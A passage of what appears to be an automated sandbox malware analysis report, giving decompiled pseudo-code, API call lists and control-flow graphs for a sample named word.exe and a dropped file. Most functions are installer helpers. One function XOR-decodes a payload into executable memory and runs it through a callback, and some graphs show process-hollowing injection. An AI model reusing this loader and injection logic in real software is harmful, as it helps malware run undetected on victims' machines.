                                                          						if(_a8 == 0x419 &&  *0x420518 != _t22) {
                                                          							 *0x420518 = _t22;
                                                          							E00405AF4(0x420530, 0x424000);
                                                          							E00405A52(0x424000, _t22);
                                                          							E0040140B(6);
                                                          							E00405AF4(0x424000, 0x420530);
                                                          						}
                                                          						L11:
                                                          						return CallWindowProcA( *0x420520, _a4, _a8, _a12, _t22);
                                                          					}
                                                          					if(IsWindowVisible(_a4) == 0) {
                                                          						L10:
                                                          						_t22 = _a16;
                                                          						goto L11;
                                                          					}
                                                          					_t22 = E0040476E(_a4, 1);
                                                          					_a8 = 0x419;
                                                          					goto L7;
                                                          				}
                                                          				if(_a12 != 0x20) {
                                                          					goto L10;
                                                          				}
                                                          				E00403F41(0x413);
                                                          				return 0;
                                                          			}





                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404E25
                                                          • CallWindowProcA.USER32(?,00000200,?,?), ref: 00404E93
                                                            • Part of subcall function 00403F41: SendMessageA.USER32 ref: 00403F53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
                                                          • Instruction ID: 29fcd441dffe1e7b6305a3cd4593f976d2a152948ddea41a7ee803b159643aa2
                                                          • Opcode Fuzzy Hash: 502464d238130af793e5dd4416e0b03d6a5de7fe60fe2b59f7980452aa14ff43
                                                          • Instruction Fuzzy Hash: B1113071600218BBDF219F91EC40A9B3769BF84765F00813AFA08691A2C7B94D91DFED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00402521(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                          				int _t5;
                                                          				long _t7;
                                                          				struct _OVERLAPPED* _t11;
                                                          				intOrPtr* _t15;
                                                          				void* _t17;
                                                          				int _t21;
                                                          
                                                          				_t15 = __esi;
                                                          				_t11 = __ebx;
                                                          				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                                                          					_t7 = lstrlenA(E00402A85(0x11));
                                                          				} else {
                                                          					E00402A68(1);
                                                          					 *0x4097f8 = __al;
                                                          				}
                                                          				if( *_t15 == _t11) {
                                                          					L8:
                                                          					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                          				} else {
                                                          					_t5 = WriteFile(E00405A6B(_t17 + 8, _t15), "C:\Users\Albus\AppData\Local\Temp", _t7, _t17 + 8, _t11);
                                                          					_t21 = _t5;
                                                          					if(_t21 == 0) {
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t17 - 4));
                                                          				return 0;
                                                          			}










                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 0040253F
                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp,00000000,?), ref: 0040255E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileWritelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 427699356-2935972921
                                                          • Opcode ID: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
                                                          • Instruction ID: f3470f1ba8555a22246df6218562ebca8c23e151121f121bd8a2f796b88427a7
                                                          • Opcode Fuzzy Hash: 43c287db0b9488ba1958c90e0c04839735a403a3c50cc02975388901bfa035a1
                                                          • Instruction Fuzzy Hash: 97F0BE72A44241BED710EFA09E99AEF76A8CB00309F10043BB142F60C2D6FC4B419B2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405E13(int _a4) {
                                                          				struct tagMSG _v32;
                                                          				int _t5;
                                                          				int _t9;
                                                          
                                                          				_t9 = _a4;
                                                          				while(1) {
                                                          					_t5 = PeekMessageA( &_v32, 0, _t9, _t9, 1);
                                                          					if(_t5 == 0) {
                                                          						break;
                                                          					}
                                                          					DispatchMessageA( &_v32);
                                                          				}
                                                          				return _t5;
                                                          			}







                                                          APIs
                                                          • DispatchMessageA.USER32 ref: 00405E2A
                                                          • PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 00405E3A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Message$DispatchPeek
                                                          • String ID: tCPInfo
                                                          • API String ID: 1770753511-2120998202
                                                          • Opcode ID: 427dd6a18e7e0659736ce79ff26561a4230ba81269168d82dcbc505d24d2deb6
                                                          • Instruction ID: b418400924ad5d261256fe136df885be693c5a8b8b6dcaec19dd907e9b62b21e
                                                          • Opcode Fuzzy Hash: 427dd6a18e7e0659736ce79ff26561a4230ba81269168d82dcbc505d24d2deb6
                                                          • Instruction Fuzzy Hash: B7E08673900118A7CA10AB99DC09ECB776CDB95750F004032FA01F71C4D6B4FA018AF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040562E(char* _a4) {
                                                          				char* _t3;
                                                          				char* _t5;
                                                          
                                                          				_t5 = _a4;
                                                          				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                          				while( *_t3 != 0x5c) {
                                                          					_t3 = CharPrevA(_t5, _t3);
                                                          					if(_t3 > _t5) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				 *_t3 =  *_t3 & 0x00000000;
                                                          				return  &(_t3[1]);
                                                          			}






                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402CEA,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405634
                                                          • CharPrevA.USER32(80000000,00000000), ref: 00405642
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming, xrefs: 0040562E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\AppData\Roaming
                                                          • API String ID: 2709904686-2707566632
                                                          • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                          • Instruction ID: 55d490dd391442433e5efd6983ceb3f41bba8d4964d1e45b55f62cb9bfffce1e
                                                          • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                          • Instruction Fuzzy Hash: EBD0C7A2409EB05EF30362149C04B9F7A58DF16711F494862F544A62A1C2785C428FAD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405740(CHAR* _a4, CHAR* _a8) {
                                                          				int _t10;
                                                          				int _t15;
                                                          				CHAR* _t16;
                                                          
                                                          				_t15 = lstrlenA(_a8);
                                                          				_t16 = _a4;
                                                          				while(lstrlenA(_t16) >= _t15) {
                                                          					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                          					_t10 = lstrcmpiA(_t16, _a8);
                                                          					if(_t10 == 0) {
                                                          						return _t16;
                                                          					}
                                                          					_t16 = CharNextA(_t16);
                                                          				}
                                                          				return 0;
                                                          			}







                                                          APIs
                                                          • lstrlenA.KERNEL32(?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405747
                                                          • lstrcmpiA.KERNEL32(?,?,?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405760
                                                          • CharNextA.USER32(?), ref: 0040576E
                                                          • lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040594E,00000000,[Rename]), ref: 00405777
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
                                                          • Instruction ID: aca38312d8f432cd573fb0c64364face36d8f92203a8fe78b636acf1828773cc
                                                          • Opcode Fuzzy Hash: 2e32237a626722e8137879666343952be07cc79a6fe12a37d3b79e97bd5271ec
                                                          • Instruction Fuzzy Hash: 52F0A736249D51DAC2129B255C44D6B7A94EF91355F14057AF440F3180D335A815ABBB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          control_flow_graph 0 f03f8-f04e3 GetPEB call f07a4 * 7 call f0772 CreateFileW 17 f05cd 0->17 18 f04e9-f04f3 0->18 19 f05cf-f05d3 17->19 23 f05c9-f05cb 18->23 24 f04f9-f0509 VirtualAlloc 18->24 21 f05fc-f0600 19->21 22 f05d5-f05d7 19->22 25 f05e4-f05e9 21->25 26 f0602-f0607 21->26 27 f05dd-f05e2 22->27 28 f05d9 22->28 34 f05c4-f05c7 23->34 24->23 31 f050f-f051e ReadFile 24->31 29 f05eb-f05f0 25->29 30 f05f2-f05f4 25->30 32 f0609-f0611 VirtualFree 26->32 33 f0614-f061a 26->33 27->21 28->27 29->21 35 f05fa 30->35 36 f05f6-f05f8 30->36 31->23 37 f0524-f0545 VirtualAlloc 31->37 32->33 34->19 35->21 36->21 39 f0547-f055c call f070b 37->39 40 f05c2 37->40 43 f055e-f0567 39->43 44 f0593-f05a7 call f07a4 39->44 40->34 45 f056a-f0591 call f070b 43->45 44->19 49 f05a9-f05ab 44->49 45->44 51 f05ad-f05ae CloseHandle 49->51 52 f05b1-f05c0 VirtualFree 49->52 51->52 52->34
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 000F04DB
                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 000F0502
                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000F0519
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 000F053D
                                                          • CloseHandle.KERNELBASE(00000000,?), ref: 000F05AE
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 000F05B9
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 000F0611
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                                          • String ID:
                                                          • API String ID: 721982790-0
                                                          • Opcode ID: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                                          • Instruction ID: d7da3fdcb9d68c781494c6fcc272250926e22fd52bde8bf1c9d536ee9a537f1a
                                                          • Opcode Fuzzy Hash: ac91823fcceb24bdfeaa8284b71a33b08aac73ab2278b65ec93cbc451416ea79
                                                          • Instruction Fuzzy Hash: 36619074F007189BDF10DBA4C884BBEBBB5AF88B10F148059EA05EB692D7B49D01DF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 411 9b1d57-9b1d64 SetUnhandledExceptionFilter
                                                          C-Code - Quality: 100%
                                                          			E009B1D57(_Unknown_base(*)()* _a4) {
                                                          				_Unknown_base(*)()* _t2;
                                                          
                                                          				_t2 = SetUnhandledExceptionFilter(_a4); // executed
                                                          				return _t2;
                                                          			}




                                                          0x009b1d5d
                                                          0x009b1d64

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 009B1D5D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 9c46a813a520d2a5eac862ba01a2e1387a370b8d402adeece15edf56c9245e4c
                                                          • Instruction ID: fb5143a330b1730fc4f432e317d94e2d797fa790d4b10fe2e7a9824a193787ae
                                                          • Opcode Fuzzy Hash: 9c46a813a520d2a5eac862ba01a2e1387a370b8d402adeece15edf56c9245e4c
                                                          • Instruction Fuzzy Hash: CAA0113000C20CAB8A002B82EC08888BF2CEA022A0B0000A0F80C000208B22A820AAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 91%
                                                          			E009A1000(void* __edx) {
                                                          				int _v8;
                                                          				void* _t8;
                                                          				void* _t9;
                                                          				_Unknown_base(*)()* _t12;
                                                          				signed int _t21;
                                                          				signed int _t24;
                                                          				signed int _t27;
                                                          				void* _t29;
                                                          				signed int _t40;
                                                          				signed int _t41;
                                                          				signed int _t43;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				_Unknown_base(*)()* _t56;
                                                          				void* _t58;
                                                          
                                                          				_t48 = __edx;
                                                          				_t58 = 0;
                                                          				_t8 = E009AE38B((CommandLineToArgvW(GetCommandLineW(),  &_v8))[1], 0x9ce000); // executed
                                                          				_t29 = _t8;
                                                          				_t9 = VirtualAlloc(0, 0x1ad27480, 0x3000, 4); // executed
                                                          				if(_t9 == 0) {
                                                          					return 0;
                                                          				} else {
                                                          					E009AE740(_t9, 0x99, 0x1ad27480);
                                                          					_t12 = VirtualAlloc(0, 0x12de, 0x3000, 0x40); // executed
                                                          					_t56 = _t12;
                                                          					E009AE68F(_t56, 0x12de, 1, _t29); // executed
                                                          					do {
                                                          						 *(_t56 + _t58) = (( *(_t56 + _t58) - 0x00000011 ^ 0x000000f0) - 0x00000064 ^ 0x0000001b) - 0x0000007c ^ 0x0000004c;
                                                          						_t58 = _t58 + 1;
                                                          					} while (_t58 < 0x12de);
                                                          					_t21 = EnumSystemCodePagesA(_t56, 0); // executed
                                                          					if(_t21 == 0xe12f) {
                                                          						_t49 = _t48 + 0xdb0e;
                                                          						_pop(_t40);
                                                          						_t41 =  !_t40;
                                                          						if(( !_t21 ^ 0x0000cd45) != 0x6082) {
                                                          							_t41 = 0xbc6b;
                                                          							_t49 = _t49 - 1;
                                                          						}
                                                          						_pop(_t24);
                                                          						_t27 = (_t24 & 0x000161dd) - 0xfffffffffffec5f9;
                                                          						_t43 =  !(_t41 - 0xb1b2);
                                                          						if(_t27 != 0xb7d3) {
                                                          							_t27 = _t27 & 0x00010f24;
                                                          							_t43 = _t43 + 0x158ad;
                                                          						}
                                                          						return _t27;
                                                          					} else {
                                                          						return _t21;
                                                          					}
                                                          				}
                                                          			}



















                                                          APIs
                                                          • GetCommandLineW.KERNEL32(?), ref: 009A100D
                                                          • CommandLineToArgvW.SHELL32(00000000), ref: 009A1014
                                                            • Part of subcall function 009AE38B: __wfsopen.LIBCMT ref: 009AE396
                                                          • VirtualAlloc.KERNELBASE(00000000,1AD27480,00003000,00000004), ref: 009A103E
                                                          • _memset.LIBCMT ref: 009A1053
                                                          • VirtualAlloc.KERNELBASE(00000000,000012DE,00003000,00000040), ref: 009A1068
                                                          • __fread_nolock.LIBCMT ref: 009A1076
                                                          • EnumSystemCodePagesA.KERNEL32(00000000,00000000), ref: 009A1098
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923253076.00000000009A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009A0000, based on PE: true
                                                          • Associated: 00000005.00000002.923232315.00000000009A0000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923391583.00000000009C7000.00000002.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923447610.00000000009CE000.00000004.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000005.00000002.923481018.00000000009D2000.00000002.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9a0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: AllocCommandLineVirtual$ArgvCodeEnumPagesSystem__fread_nolock__wfsopen_memset
                                                          • String ID:
                                                          • API String ID: 888471934-0
                                                          • Opcode ID: 4e575d93ae745fd6906b45574bc25acebd465c2f819347f34fc8012e3b7d6426
                                                          • Instruction ID: cf1c75c39596ef5f68149554becab00d9d945a78adc6aec58eea021e2ac2f9d6
                                                          • Opcode Fuzzy Hash: 4e575d93ae745fd6906b45574bc25acebd465c2f819347f34fc8012e3b7d6426
                                                          • Instruction Fuzzy Hash: 37217C776586043BF32426B4EC5BFFB3A5DD781308F594539F701DA1C2DE6CA98242A8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 70 f1015-f10c3 call f06f7 call f07a4 * 7 87 f10c6-f10ca 70->87 88 f10cc-f10e0 87->88 89 f10e2-f10ef 87->89 88->87 90 f10f2-f10f6 89->90 91 f110e-f112a 90->91 92 f10f8-f110c 90->92 94 f112c-f112f 91->94 95 f1134-f115e CreateProcessW 91->95 92->90 96 f12d7-f12d8 94->96 98 f1168-f1181 95->98 99 f1160-f1163 95->99 101 f118b-f11a5 ReadProcessMemory 98->101 102 f1183-f1186 98->102 99->96 103 f11af-f11b8 101->103 104 f11a7-f11aa 101->104 102->96 105 f11ba-f11c9 103->105 106 f11e2-f1202 VirtualAllocEx 103->106 104->96 105->106 107 f11cb-f11d8 call f0360 105->107 108 f120c-f1224 call f0261 106->108 109 f1204-f1207 106->109 107->106 116 f11da-f11dd 107->116 114 f122e-f1232 108->114 115 f1226-f1229 108->115 109->96 117 f123b-f1245 114->117 115->96 116->96 118 f127c-f1298 call f0261 117->118 119 f1247-f1275 call f0261 117->119 125 f129f-f12bd Wow64SetThreadContext 118->125 126 f129a-f129d 118->126 122 f127a 119->122 122->117 127 f12bf-f12c2 125->127 128 f12c4-f12c7 call f01b2 125->128 126->96 127->96 130 f12cc-f12ce 128->130 131 f12d5 130->131 132 f12d0-f12d3 130->132 131->96 132->96
                                                          APIs
                                                          • CreateProcessW.KERNEL32(?,00000000), ref: 000F1159
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: D
                                                          • API String ID: 963392458-2746444292
                                                          • Opcode ID: fa090b6a6734da87d4db60132989cd82d466b43500cf08a9aca2b273afd475e8
                                                          • Instruction ID: 363cdfaaafe3f4f704d9c9a976f23b8946fd600999ab4cb753eb3204c487b127
                                                          • Opcode Fuzzy Hash: fa090b6a6734da87d4db60132989cd82d466b43500cf08a9aca2b273afd475e8
                                                          • Instruction Fuzzy Hash: 05A1D270E0020DEFDB90DBA5C981BEEBBB5BF48304F2040A9E615EB651D775AA51EF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 133 f0809-f09e9 call f06f7 call f07a4 * 10 CreateFileW 159 f09ed-f09fc 133->159 160 f09eb 133->160 163 f09fe 159->163 164 f0a00-f0a16 VirtualAlloc 159->164 161 f0a53-f0a54 160->161 163->161 165 f0a1a-f0a2e ReadFile 164->165 166 f0a18 164->166 167 f0a32-f0a50 CloseHandle call f0a55 call f0cef ExitProcess 165->167 168 f0a30 165->168 166->161 168->161
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 000F09DF
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.923103102.00000000000F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_f0000_dvukljmnr.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 850f1c6363aedebf560b8a6955ee5afce56935f5c30a1746b72258c0d9977697
                                                          • Instruction ID: c8a6bf8da7fb10ea114d186ce164d3e686190fe81856b5d9d848f5cb55041677
                                                          • Opcode Fuzzy Hash: 850f1c6363aedebf560b8a6955ee5afce56935f5c30a1746b72258c0d9977697
                                                          • Instruction Fuzzy Hash: 0D714A35E5034CAADF60DBE4E912BFDB7B5AF88710F20545AE608EA2E1D7711A40EB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 173 9ae4ca-9ae4e3 174 9ae500 173->174 175 9ae4e5-9ae4ea 173->175 177 9ae502-9ae508 174->177 175->174 176 9ae4ec-9ae4ee 175->176 178 9ae509-9ae50e 176->178 179 9ae4f0-9ae4f5 call 9af100 176->179 181 9ae51c-9ae520 178->181 182 9ae510-9ae51a 178->182 190 9ae4fb call 9aeb1e 179->190 185 9ae522-9ae52d call 9ae740 181->185 186 9ae530-9ae532 181->186 182->181 184 9ae540-9ae54f 182->184 188 9ae551-9ae554 184->188 189 9ae556 184->189 185->186 186->179 187 9ae534-9ae53e 186->187 187->179 187->184 193 9ae55b-9ae560 188->193 189->193 190->174 195 9ae649-9ae64c 193->195 196 9ae566-9ae56d 193->196 195->177 197 9ae5ae-9ae5b0 196->197 198 9ae56f-9ae577 196->198 199 9ae61a-9ae61b call 9af572 197->199 200 9ae5b2-9ae5b4 197->200 198->197 201 9ae579 198->201 208 9ae620-9ae624 199->208 203 9ae5d8-9ae5e3 200->203 204 9ae5b6-9ae5be 200->204 205 9ae57f-9ae581 201->205 206 9ae677 201->206 211 9ae5e7-9ae5ea 203->211 212 9ae5e5 203->212 209 9ae5ce-9ae5d2 204->209 210 9ae5c0-9ae5cc 204->210 213 9ae588-9ae58d 205->213 214 9ae583-9ae585 205->214 207 9ae67b-9ae684 206->207 207->177 208->207 215 9ae626-9ae62b 208->215 216 9ae5d4-9ae5d6 209->216 210->216 217 9ae5ec-9ae5f8 call 9af693 call 9af84a 211->217 218 9ae651-9ae655 211->218 212->211 213->218 219 9ae593-9ae5ac call 9af6b7 213->219 214->213 215->218 220 9ae62d-9ae63e 215->220 216->211 234 9ae5fd-9ae602 217->234 221 9ae667-9ae672 call 9af100 218->221 222 9ae657-9ae664 call 9ae740 218->222 230 9ae60f-9ae618 219->230 225 9ae641-9ae643 220->225 221->190 222->221 225->195 225->196 230->225 235 9ae608-9ae60b 234->235 236 9ae689-9ae68d 234->236 235->206 237 9ae60d 235->237 236->207 237->230
                                                          C-Code - Quality: 69%
                                                          			E009AE4CA(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                                          				char* _v8;
                                                          				signed int _v12;
                                                          				signed int _v16;
                                                          				signed int _v20;
                                                          				void* __ebx;
                                                          				void* __esi;
                                                          				signed int _t74;
                                                          				signed int _t78;
                                                          				char _t81;
                                                          				signed int _t86;
                                                          				signed int _t88;
                                                          				signed int _t91;
                                                          				signed int _t94;
                                                          				signed int _t97;
                                                          				signed int _t98;
                                                          				char* _t99;
                                                          				signed int _t100;
                                                          				signed int _t102;
                                                          				signed int _t103;
                                                          				signed int _t104;
                                                          				char* _t110;
                                                          				signed int _t113;
                                                          				signed int _t117;
                                                          				signed int _t119;
                                                          				void* _t120;
                                                          
                                                          				_t99 = _a4;
                                                          				_t74 = _a8;
                                                          				_v8 = _t99;
                                                          				_v12 = _t74;
                                                          				if(_a12 == 0) {
                                                          					L5:
                                                          					return 0;
                                                          				}
                                                          				_t97 = _a16;
                                                          				if(_t97 == 0) {
                                                          					goto L5;
                                                          				}
                                                          				if(_t99 != 0) {
                                                          					_t119 = _a20;
                                                          					__eflags = _t119;
                                                          					if(_t119 == 0) {
                                                          						L9:
                                                          						__eflags = _a8 - 0xffffffff;
                                                          						if(_a8 != 0xffffffff) {
                                                          							_t74 = E009AE740(_t99, 0, _a8);
                                                          							_t120 = _t120 + 0xc;
                                                          						}
                                                          						__eflags = _t119;
                                                          						if(_t119 == 0) {
                                                          							goto L3;
                                                          						} else {
                                                          							_t78 = _t74 | 0xffffffff;
                                                          							__eflags = _t97 - _t78 / _a12;
                                                          							if(_t97 > _t78 / _a12) {
                                                          								goto L3;
                                                          							}
                                                          							L13:
                                                          							_t117 = _a12 * _t97;
                                                          							__eflags =  *(_t119 + 0xc) & 0x0000010c;
                                                          							_t98 = _t117;
                                                          							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
